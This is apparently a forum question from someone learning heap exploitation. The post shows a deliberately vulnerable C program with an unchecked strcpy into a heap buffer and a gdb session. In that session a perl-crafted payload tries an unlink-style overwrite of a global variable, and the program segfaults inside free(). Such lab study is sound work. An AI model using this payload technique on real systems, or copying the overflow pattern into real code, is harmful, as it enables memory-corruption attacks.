I have been trying to exploit the heap overflow vulnerability for the program below, I am running Linux 14.04.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int n = 5;
int main(int argc, char **argv) {
char *p, *q;
p = malloc(1024);
q = malloc(1024);
if (argc >= 2)
strcpy(p, argv[1]);
free(q);
printf("n = 0x%08x\n", n);
free(p);
return 0;
}
In this exploit i am trying to write a 32 bit random address of stack into variable "n" present in the program,using the unlink() technique.
However when the free() is called the program segfaults.
This is my input:
(gdb) p &n
$1 = (<data variable, no debug info> *) 0x804a02c <n>
(gdb) x/xw 0x804a02c-0xc (address-12 bytes)
0x804a020 <__libc_start_main@got.plt>: 0xb7e27990
(gdb) x/2xw $ebp
0xbffff1c8: 0x00000000 0xb7e27a83
0xbffff1c8+4bytes=0xbffff1cc
(gdb) r `perl -e 'print "A"x1024 . "\xfc\xff\xff\xbf"x2 . "XXXX" . "\x20\xa0\x04\x08" . "\xcc\xff\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/HIIII/heap_overflow/test/heap_1 `perl -e 'print "A"x1024 . "\xfc\xff\xff\xbf"x2 . "XXXX" . "\x20\xa0\x04\x08" . "\xcc\xff\xff\xbf"'`
Program received signal SIGSEGV, Segmentation fault.
=> 0xb7e857e0 <__GI___libc_free+64>: mov (%eax),%eax
0xb7e857e2 <__GI___libc_free+66>: movl $0x0,0x20(%esp)
0xb7e857ea <__GI___libc_free+74>: add $0x18,%esp
0xb7e857ed <__GI___libc_free+77>: pop %ebx
0xb7e857ee <__GI___libc_free+78>: jmp 0xb7e82520 <_int_free>
0xb7e857f3 <__GI___libc_free+83>: nop
0xbffff180: 0xbffff1c8 0xb7ff2500 0x0804b412 0xb7e857a0
0xbffff190: 0x0804b410 0xb7e857a6 0xb7fb9000 0x08048500
0xbffff1a0: 0x0804b410 0xbffff3d6
***0xb7e857e0 in __GI___libc_free (mem=0x804b410) at malloc.c:2945
2945 malloc.c: No such file or directory.***
I have taken this attack vector from http://www.win.tue.nl/~aeb/linux/hh/hh-11.html (uses glibc-2.2.4)
Thanks in advance
